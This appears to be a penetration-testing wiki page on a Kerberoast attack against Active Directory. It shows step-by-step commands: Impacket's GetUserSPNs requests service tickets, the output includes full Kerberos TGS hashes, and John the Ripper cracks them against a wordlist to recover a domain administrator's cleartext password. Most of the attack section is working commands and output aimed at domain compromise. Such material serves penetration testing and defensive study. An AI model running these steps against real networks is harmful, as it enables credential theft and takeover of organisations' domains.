Internal Pentest Active Directory Exploitation Exploit With Account Kerberoast Attack This page deals with compromising Active Directory with Kerberoast attack.
Introduction
For several reasons, it is very common in Active Directory environments to find services launched with domain administrator accounts. A Service Principal Name (SPN) associates a service and the user who launched it.
Copy ServicePrincipalName Name MemberOf PasswordLastSet
---------------------------------- ---------- ------------------------------------------------ -------------------
http/win10.sittingduck.info uberuser CN=Domain Admins,CN=Users,DC=sittingduck,DC=info 2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info sqladmin01 2016-05-13 19:13:20
Any domain user is allowed to request a ticket for a service and locally crack it to retrieve the cleartext password of the domain administrator who launched the service.
If the attack is successful, the attacker compromise the Active Directory domain.
Request SPNs Tickets
Use Impacket 's GetUserSPNs:
Copy root@wpad:~/impacket/examples# ./GetUserSPNs.py -request sittingduck.info/notanadmin
Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet
---------------------------------- ---------- ---------------------------------------------------- -------------------
http/win10.sittingduck.info uberuser CN=Domain Admins,CN=Users,DC=sittingduck,DC=info 2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info sqladmin01 2016-05-13 19:13:20
$krb5tgs$23$ * sqladmin01$SITTINGDUCK.INFO$SPN * $6e5307df490c6e3339f613fdc5655785$80ba233b4d24531202f2e354c99e7eda807bde7aeeb48ee4cdb6bf809d78652413699e3cff8b9b78b9ee70e997a538155fc7f72e208d715020d458b8413d4b12b212738833c4694d84937d65cb8ecd0020c00a5d39c07da35a748ea2cb062fca4fa9b282e7046d70ee1cae4cfee7d6f791052e283
$krb5tgs$23$*uberuser$SITTINGDUCK.INFO$SPN*$27c08ed2a8d5394f66e8c13c25c98393$310b787ec5c10b20fcc0acb1406b6a6e2ffddd71de3dc4c70c19e5dfcf262cc88574e61cb3940ebfd574b2bb555f2b05f84d8526e3cf46fc0ca57e03467729757cbf79da9f55cde9dabdda68e80dce6564e9f1b904b0585dbc813b82abf89e973e41c102b664f4c649f85acaf7904a273dddcb9315a66f27334f313190e1caf4f5055b671d250f5912cc1871a1dd4a6126087ddfb98ade8f7dde495ee8ad76583aa5a12eef63a690dd82a15eaaca0d7594f2f1dbc899035d89dd628b291590058cfb3405d1dfe4a383be5704465d9c8972ef8f1cba3541fdfa7dcf5063eaed74051fa18bd73f7b4f7d77
uberuser belongs to Domain Admins group (cf. MemberOf column) .
Crack Tickets
First, install MagnumRipper version of John The Ripper which supports KRB5TGS format.
Then crack Tickets to obtain cleartext passwords:
Copy root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4] )
Warning: OpenMP is disabled ; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44 ) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123 ($krb5tgs$unkown)
ASDqwe123 ($krb5tgs$unkown)
It is an efficient way to compromise domain admin password and consequently Active Directory domain.
References